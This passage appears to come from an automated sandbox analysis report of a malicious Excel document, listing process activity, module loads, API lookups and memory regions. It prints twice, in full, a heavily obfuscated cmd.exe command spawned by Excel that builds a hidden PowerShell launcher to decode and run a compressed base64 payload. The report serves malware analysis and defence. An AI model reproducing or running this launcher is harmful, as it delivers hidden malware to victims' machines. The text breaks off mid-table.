^H8^O=^QBL^9tiq^E^M^8^utN) ,, , )& (,(s^et bC^0=h^K) ,)&& ( , , ,, , (s^ET ^cI=^(^ ^`$^_""\"" ) , )&& (, ,, (^S^et ^ID=^21^]+), )&&(^sET ^ ^Dq4G=l^Ay^v^Y8Gg6lQqsD^4Yq^Rj^O)&& ( , (^SEt ^ Ea^u=S) , )&( ,(^s^Et ^Z^HTE=0^f), , , , , )&(^S^eT ^cN^Vz=^L1)& (^se^t ^oP8=p)& ( ,(^SeT ^ UQ7^k=^s^e64sTrIN), )&& (, , , , , (SE^T ^ ^7^2=^cP^V) , , , , ,)& (^SE^T ^cOyd=^RIng^(^) ^ )& (Se^T ^ X^j=+^ )&&( ,(S^eT ^Eh^p=^-ExEC^Ut ) , )& ( ,(^S^et ^h^g=+ ""\""[^sys^t^E^M^.^t), )& ( , (s^E^t ^ I1=W^A^Hn^u0^avhW^w^4c38X6) ,,, , ,)& (^seT ^ ^R5qC=^'^)^()& (, (SEt 3^C^he=^^^|) ,)&&(s^eT ^ HJ^VR=^ee57)&& (, (se^t ^ ^olr8=^}) , )& (,(S^Et ^I^r=^ON^.COmPR),)& (S^et ^3R^Y=^(^[ChA^r]44^))&(S^et cni^h=^E)&&(^s^eT 0^A=c^t S^Y^s^T^EM)&& (, (^Set ^ J^V^w=^od^E) , )&(^s^ET g^I=p^b^RXN^T^S)&& (^Set ^ us6=+00^z)& ( , , , (s^Et ^ C^d^J=A^p) ,)&& (SE^T bI^He=.T^oS^T)&(, (s^eT JG^A=T^]::), )&&(se^T ^ L^b=ho^M^E[34]+)&& ^sEt p^VZ=""&(, (^seT ^ ^6vzH=a) , )&( , (S^eT ^u5=^E3Kyvr^/E) ,)&&( ,(^seT ^rp=^iN^G]::^aS^C), , , )& ( ,(Set m^Lwq=U^5^EyC^8^='^)""\"" + ), , , )&& (S^ET ^ ^bn=^)^ ^+ ""\""^[^IO)&( ,(S^eT ^ c^LM=M9^ArXoE^w),)& (Se^T ^ G^U=^^^|^ )&& (S^et ^ b^HT=[)&( , (s^Et c2^Q=.rE^ad^Toen^d^(^) }^)) ,, ,)&( ,(se^t ^i8T3=^(),)&& (sE^T ^0zSA=B0/^W^9pYXW^t^tmz3U^fr^So^a)&&( , , , (sE^t ^ Eh=Z^ttA), ,, ,, )& (^S^eT ^ ^ ^VDG=N^M)&(, (Se^T ^ D^vI=ES^sI^o) )&& ( (Se^t O^c^W^L= ^^^&^(^ ^`$),)&& (, , , , ,(SE^T 3^y=I^hv) , )&(^Set q^Xu=3^D^J^dlB6l^MtdrCqa^KOl0P)& (, ,,,,(^se^T ^ ^ ^Zb='^X) , , )&& , ca^LL ,, SeT q4j=%r^M%%B^9s%%7z%%s^O%%c^g%%^rj^UN%%sZ^G%%^Vp^05%%^8R%%D^RKS%%^Eh^p%%gx^b%%^6vzH%%^Rz%%9c^u^B%%^G5Q1%%v^F%%uU^H%%v^Z^c%%a^Xch%%P^d^J6%%L^b%%^Zb%%^R5qC%%^Z13%%j1%%x^S%%eZ^P%%^a^z8%%^U19%%b^1%%^AN%%Sq^5^s%%JG^A%%^LK%%UQ7^k%%^J^F^O6%%bv%%us6%%^c^wH%%c^WSV%%C^d^J%%G^Y%%^q0^C^c%%^e^yWN%%^Z^HTE%%G1^yS%%^ep3A%%^ir^1^V%%l^6e%%Zz^t%%^BW7%%LI^j%%^aMG%%I1%%J^6%%^cN^Vz%%C^ij%%b^aCI%%OE^9^Q%%J^Z%%^DG%%q^Xu%%^E^f%%x^dNR%%g^I%%3^y%%^S^l%%dn%%^7^2%%^H8^O%%q8%%^u5%%^s^Hnp%%^aw^yI%%c^LM%%^0zSA%%Op^1%%^Dq4G%%^Rw%%r^Y%%^z^RJ%%^g^Vkp%%bC^0%%^3B%%^a^g%%^6rH^Y%%^CY%%^M^t%%Ea^u% | os_pid = 0xac0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
Module (148)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | Comctl32.dll | base_address = 0x7fefc690000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x7fee57c0000 |
|
1 | |
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL | base_address = 0x7fee6a30000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x7feffd80000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x7fee5a60000 |
|
6 | |
| Get Handle | Unknown module name | base_address = 0x13f4a0000 |
|
1 | |
| Get Handle | MSI.DLL | base_address = 0x7fefa750000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | USER32 | base_address = 0x77a20000 |
|
1 | |
| Get Handle | oleaut32.dll | base_address = 0x7feffd80000 |
|
1 | |
| Get Filename | - | process_name = c:\program files\microsoft office\root\office16\excel.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
3 | |
| Get Address | Unknown module name | function = MsiProvideQualifiedComponentA, address_out = 0x7fefa7d3b3c |
|
1 | |
| Get Address | Unknown module name | function = MsiGetProductCodeA, address_out = 0x7fefa7ca13c |
|
1 | |
| Get Address | Unknown module name | function = MsiReinstallFeatureA, address_out = 0x7fefa7d1618 |
|
1 | |
| Get Address | Unknown module name | function = MsiProvideComponentA, address_out = 0x7fefa7cf088 |
|
1 | |
| Get Address | Unknown module name | function = MsoVBADigSigCallDlg, address_out = 0x7fee58c72c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoVbaInitSecurity, address_out = 0x7fee58360b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFIEPolicyAndVersion, address_out = 0x7fee57e1a60 |
|
1 | |
| Get Address | Unknown module name | function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee5835f50 |
|
1 | |
| Get Address | Unknown module name | function = MsoFInitOffice, address_out = 0x7fee57df000 |
|
1 | |
| Get Address | Unknown module name | function = MsoUninitOffice, address_out = 0x7fee57ce860 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetFontSettings, address_out = 0x7fee57c3fc0 |
|
1 | |
| Get Address | Unknown module name | function = MsoRgchToRgwch, address_out = 0x7fee57d2380 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface, address_out = 0x7fee57c7b80 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrSimpleQueryInterface2, address_out = 0x7fee57c7b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateControl, address_out = 0x7fee57c8730 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongLoad, address_out = 0x7fee5903260 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLongSave, address_out = 0x7fee5903280 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetTooltips, address_out = 0x7fee57d1f40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetTooltips, address_out = 0x7fee5836370 |
|
1 | |
| Get Address | Unknown module name | function = MsoFLoadToolbarSet, address_out = 0x7fee5824590 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateToolbarSet, address_out = 0x7fee57c55b0 |
|
1 | |
| Get Address | Unknown module name | function = MsoHpalOffice, address_out = 0x7fee57d0240 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProcNeeded, address_out = 0x7fee57c3d10 |
|
1 | |
| Get Address | Unknown module name | function = MsoFWndProc, address_out = 0x7fee57c6d30 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateITFCHwnd, address_out = 0x7fee57c3d40 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyITFC, address_out = 0x7fee57ce6f0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee57cdf40 |
|
1 | |
| Get Address | Unknown module name | function = MsoFGetComponentManager, address_out = 0x7fee57c7bf0 |
|
1 | |
| Get Address | Unknown module name | function = MsoMultiByteToWideChar, address_out = 0x7fee57cfcd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoWideCharToMultiByte, address_out = 0x7fee57c8b20 |
|
1 | |
| Get Address | Unknown module name | function = MsoHrRegisterAll, address_out = 0x7fee58c2ef0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetComponentManager, address_out = 0x7fee57d42c0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateStdComponentManager, address_out = 0x7fee57c3e20 |
|
1 | |
| Get Address | Unknown module name | function = MsoFHandledMessageNeeded, address_out = 0x7fee57cab10 |
|
1 | |
| Get Address | Unknown module name | function = MsoPeekMessage, address_out = 0x7fee57ca7d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoFCreateIPref, address_out = 0x7fee57c1550 |
|
1 | |
| Get Address | Unknown module name | function = MsoDestroyIPref, address_out = 0x7fee57ce830 |
|
1 | |
| Get Address | Unknown module name | function = MsoChsFromLid, address_out = 0x7fee57c13d0 |
|
1 | |
| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee57c6660 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee57c1500 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee57c3dd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee58c71e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee5896d10 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiFIsEdpEnabled, address_out = 0x7fee59098e0 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiEnterpriseProtect, address_out = 0x7fee5909830 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7feffd81320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7feffd8f1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7feffddcaa0 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7feffe11760 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feffe120d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7feffdac760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7feffddecd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7feffdde840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7feffdef420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7feffde4ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7feffde9350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7feffdb6e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feffd8a550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7feffdef320 |
|
1 | |
| Get Address | Unknown module name | function = GetSystemMetrics, address_out = 0x77a394f0 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromWindow, address_out = 0x77a35f08 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromRect, address_out = 0x77a32b00 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromPoint, address_out = 0x77a2ab64 |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayMonitors, address_out = 0x77a35c30 |
|
1 | |
| Get Address | Unknown module name | function = GetMonitorInfoA, address_out = 0x77a2a730 |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayDevicesA, address_out = 0x77a2a5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feffd82270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feffe0dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feffd85c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feffd86330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feffda66c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feffd84710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feffd848f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feffdbb640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feffdbb360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feffdc2640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feffda58a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feffda5820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feffdbaf20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feffdda0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feffe12160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feffda5af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feffda5a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feffda5a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feffda5a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feffd860b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feffd83e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feffdd9f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feffe09b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feffe09aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feffe09990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feffe09890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feffe09770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feffdeb8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feffdeb800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feffe048e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feffe09470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feffe096a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feffe02fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feffe09cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feffe08ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feffe09c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feffe08e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feffe03690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feffe092d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feffe02e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feffe03f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feffe091a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feffde7c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feffde7a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feffde7890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feffde7ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feffe09600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feffde76a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feffe083f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feffdb3070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feffdbd700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feffdbd890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feffd9caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feffda8a00 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x7fee57cfcd0 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x0 |
|
1 | |
| Get Address | Unknown module name | function = 600, address_out = 0x7fee5b64ee0 |
|
3 | |
| Get Address | Unknown module name | function = 712, address_out = 0x7fee5de9db0 |
|
3 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
Keyboard (30)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_ESCAPE, result_out = 0 |
|
30 |
System (20)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 562, y_out = 564 |
|
1 | |
| Get Cursor | x_out = 430, y_out = 397 |
|
1 | |
| Get Time | type = System Time, time = 2018-11-01 09:27:37 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 129980 |
|
1 | |
| Get Time | type = Local Time, time = 2018-11-01 09:27:37 (Local Time) |
|
2 | |
| Get Time | type = Local Time, time = 2018-11-01 09:27:38 (Local Time) |
|
2 | |
| Get Time | type = Local Time, time = 2018-11-01 09:27:40 (Local Time) |
|
1 | |
| Get Time | type = Ticks, time = 297540 |
|
7 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: cmd.exe
201
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /c C%PrOGRaMFIlES:~ -7,1%D, , /V:On ,,/%aPPdAta:~-7,1% " , (Se^T j1=^Ew-obje^ct I^o.c^OMp)& (^sET ^ ^J^F^O6=G^('VZBba8^IwGIb/^SpA^O^E^remtR5^Aix)&& (^s^e^t c^WSV=^A^rm^U)&& (Se^T ^ ^BW7=^XV)&( ,, , ,, (^SEt ^ C^ij=^vQN) , ,, )& (Set q^X=^i^I^))&&( , (^set ^ 8^i47=^ ^{`$_), ,, )&&(^s^Et ^ ^c^wH=^kqa02Wx^1/v^fFwy52+7z^fe^+)&& (^SEt ^q0^C^c=^9)&& (SE^T ^ ^OZ=.Co^MpR^ES)&( , , , ,, (s^E^T ^ ^ ^U19=e^a) , , )&( , (set ^8R=O) , )&&( ,(SE^T ^ ^xm=^h) )&& ( , (^s^e^t v^F=^s ^h^i^dDe), )& (S^e^t ^ep3A=^Q^OyR2U^JM)&(, ,, ,,(Se^T G1^yS=^4^oTe1Nn) , )&( (s^Et ^ r^Y=uqSZ^q^t^H7Njw) , )&( , , ,(S^E^T ^a^z8=N.^D^efLa^tesTR) , )& (^SET ^ b^1=^M^()&& (s^eT ^ D^RKS=FI^l^E^ -NoL^ogO )&& (^s^eT q^G=.^I)&& (^S^ET ^Rw=2ZZ^2)&& (S^Et G^Y=CA^C0g^IO)& ( (S^ET ^ e5^S=^`^$P^S^HO^ME[30]+'x'^)""^\"" ), , , )& (^se^t b^aCI=4k^Bwy)&& (,, , (sE^T ^ ^LK=f^R^o^m^ba), )&&(sE^t ^lPo=^([C^hAr]44^).T^oSTRIng)&& (, (s^Et Op^1=4) , )&&(se^T ^ ^E^f=a^f^tO^sH0^5)&(SE^T LI=foRE^ach^-)&&(^SeT ^ ^dv=D)&( , (Se^T ^ ^6rH^Y=^5+8) , ,, , , )&&( , , , (^Se^T ^ dn=Y/D^6) , )&& (^SE^T ^Vp^05=n^oPR)&& (, (^set ^AN=[s^ysTe^m.I^O.ME), ,,, , )&& ( ,(s^E^T ^ ^G5Q1=-^wINDO^w), )&( , ,, (s^ET 7z=o^CESs^ ) , )& (^SeT bO^q=^o^.stReAMRE^ADeR)&& ( , (Se^T ^DG=s^uB4) ,)&&( , (sE^t LI^j=^dap^D0) , )& (SE^t a^Xch=Ho^M^e)&& (S^Et ^ ^Z13= ""\""^(n)&&(, (s^ET e^q=^7) , , , )&& ( , (s^et eZ^P=o) , )&&( , (s^ET DQ=sHO^M^e) ,,, ,, )&& (s^ET ^ r^M=W^M^IC.)& ( (^SET uq^LY=]::^d^EC), , , )&& ( (s^ET ^ l^6e=b^1) , )&& (sE^t P^d^J6=[^2^1]^+$Ps)&&( ,(^SET ^ ^3B=0^dG^IO^e) ,, , , , )&& (^S^Et ^ Zz^t=g^klAj)&& (^sEt s^O= ^'CA^ll'^ ^'cRe^Ate^' ""^po)& (^SeT ^ q^2=0v^5W)&&(^se^T ^ ^A2=Ea^cH-^obj)&& ( ,(^SE^t ^ Co^Jf=^e) ,,,)&(^sEt ^ ^e^yWN=j^D8h)&&( ,(s^ET ^ ^z^RJ=^K5) , , )&& (^SeT J^6=^Fjr^iXLMf5)& ( , (s^ET ^ J^Z=1^z) ,, ,, , )&& (,(S^eT ^M^t=/D^+iA1Um^k6y^RKXmH) ,)&&( , ,,, , (^sEt 3^M^K^1=obj^ECt{nE^w^-o^bj^e), )& (se^T g^BQ=s^i)& (^seT ^ ^aMG=^u)& ( , ,, (^sE^T ^ ^aw^yI=^l) , )&( , (Se^t ^ ^ir^1^V=^h) )& (, , ,(S^Et uU^H=n^ ^ ^^^&^ ^(^ ), )&& ( , (S^Et o^JV=^^^|^ fOR),)&& (^S^e^t v^Z^c=$^p^S)&& (s^et ^ ^g^Vkp=^6)& ( , (SE^T ^CY=^4) , )&& (S^et 9c^u^B=^ )&& (se^t ^ ^Rz=^SS )&& (s^et ^ z^R=^G4G^u^tW)&&( , (se^T ^ gx^b=b^Yp) ,)& ( , (SE^t ^ ^a^g=z^P), )&&(, , , , , (S^eT sZ^G=Nt^Er^ac ^-), )& ( , (^sEt l^V^p=^OmPre^S^s^ ^)^ ) ,)& ( ,(^S^ET x^dNR=bg8^r^j), )&(,(s^E^T ^ l^R=^Ext^.eNcO) ,)&& (se^T ^ c^g=W^e^r^SH^e^ll^ -N^O)&& (^s^ET ^ OE^9^Q=DS^hyxy^yV2Apb^uy)&& ( (sET ^ Sq^5^s=Mo^RY^S^T^RE^a^m] ^[C^On^vER), )&& ( , (s^ET x^S=^re^ss^i), )& (S^eT p^v=^) "")&& ( , , , , ,(Se^t ^ I^G4^Q=^CT), )&&( , (S^ET ^ B^9s=^exe pR) ,)& (, (sE^T ^s^Hnp=0M^y), , , )&& (, (sE^T ^ ^Je=^m8) , )& (Se^t ^ bv=fa^qfNGZQobl^CJ^p)&&( , (se^T ^ q8=^v^v) , )&& (Se^T ^ ^S^l=Q^VH^cO8^e1hjBC^Xsd1^fexS2i)&& ( ,(s^ET ^ ^rj^UN=ni) , )& ( (SE^t ^H8^O=^QBL^9tiq^E^M^8^utN) ,, , )& (,(s^et bC^0=h^K) ,)&& ( , , ,, , (s^ET ^cI=^(^ ^`$^_""\"" ) , )&& (, ,, (^S^et ^ID=^21^]+), )&&(^sET ^ ^Dq4G=l^Ay^v^Y8Gg6lQqsD^4Yq^Rj^O)&& ( , (^SEt ^ Ea^u=S) , )&( ,(^s^Et ^Z^HTE=0^f), , , , , )&(^S^eT ^cN^Vz=^L1)& (^se^t ^oP8=p)& ( ,(^SeT ^ UQ7^k=^s^e64sTrIN), )&& (, , , , , (SE^T ^ ^7^2=^cP^V) , , , , ,)& (^SE^T ^cOyd=^RIng^(^) ^ )& (Se^T ^ X^j=+^ )&&( ,(S^eT ^Eh^p=^-ExEC^Ut ) , )& ( ,(^S^et ^h^g=+ ""\""[^sys^t^E^M^.^t), )& ( , (s^E^t ^ I1=W^A^Hn^u0^avhW^w^4c38X6) ,,, , ,)& (^seT ^ ^R5qC=^'^)^()& (, (SEt 3^C^he=^^^|) ,)&&(s^eT ^ HJ^VR=^ee57)&& (, (se^t ^ ^olr8=^}) , )& (,(S^Et ^I^r=^ON^.COmPR),)& (S^et ^3R^Y=^(^[ChA^r]44^))&(S^et cni^h=^E)&&(^s^eT 0^A=c^t S^Y^s^T^EM)&& (, (^Set ^ J^V^w=^od^E) , )&(^s^ET g^I=p^b^RXN^T^S)&& (^Set ^ us6=+00^z)& ( , , , (s^Et ^ C^d^J=A^p) ,)&& (SE^T bI^He=.T^oS^T)&(, (s^eT JG^A=T^]::), )&&(se^T ^ L^b=ho^M^E[34]+)&& ^sEt p^VZ=""&(, (^seT ^ ^6vzH=a) , )&( , (S^eT ^u5=^E3Kyvr^/E) ,)&&( ,(^seT ^rp=^iN^G]::^aS^C), , , )& ( ,(Set m^Lwq=U^5^EyC^8^='^)""\"" + ), , , )&& (S^ET ^ ^bn=^)^ ^+ ""\""^[^IO)&( ,(S^eT ^ c^LM=M9^ArXoE^w),)& (Se^T ^ G^U=^^^|^ )&& (S^et ^ b^HT=[)&( , (s^Et c2^Q=.rE^ad^Toen^d^(^) }^)) ,, ,)&( ,(se^t ^i8T3=^(),)&& (sE^T ^0zSA=B0/^W^9pYXW^t^tmz3U^fr^So^a)&&( , , , (sE^t ^ Eh=Z^ttA), ,, ,, )& (^S^eT ^ ^ ^VDG=N^M)&(, (Se^T ^ D^vI=ES^sI^o) )&& ( (Se^t O^c^W^L= ^^^&^(^ ^`$),)&& (, , , , ,(SE^T 3^y=I^hv) , )&(^Set q^Xu=3^D^J^dlB6l^MtdrCqa^KOl0P)& (, ,,,,(^se^T ^ ^ ^Zb='^X) , , )&& , ca^LL ,, SeT q4j=%r^M%%B^9s%%7z%%s^O%%c^g%%^rj^UN%%sZ^G%%^Vp^05%%^8R%%D^RKS%%^Eh^p%%gx^b%%^6vzH%%^Rz%%9c^u^B%%^G5Q1%%v^F%%uU^H%%v^Z^c%%a^Xch%%P^d^J6%%L^b%%^Zb%%^R5qC%%^Z13%%j1%%x^S%%eZ^P%%^a^z8%%^U19%%b^1%%^AN%%Sq^5^s%%JG^A%%^LK%%UQ7^k%%^J^F^O6%%bv%%us6%%^c^wH%%c^WSV%%C^d^J%%G^Y%%^q0^C^c%%^e^yWN%%^Z^HTE%%G1^yS%%^ep3A%%^ir^1^V%%l^6e%%Zz^t%%^BW7%%LI^j%%^aMG%%I1%%J^6%%^cN^Vz%%C^ij%%b^aCI%%OE^9^Q%%J^Z%%^DG%%q^Xu%%^E^f%%x^dNR%%g^I%%3^y%%^S^l%%dn%%^7^2%%^H8^O%%q8%%^u5%%^s^Hnp%%^aw^yI%%c^LM%%^0zSA%%Op^1%%^Dq4G%%^Rw%%r^Y%%^z^RJ%%^g^Vkp%%bC^0%%^3B%%^a^g%%^6rH^Y%%^CY%%^M^t%%Ea^u%% |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:22, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xac0 |
| Parent PID | 0x928 (c:\program files\microsoft office\root\office16\excel.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AC4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00280000 | 0x002e6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | r |
|
|
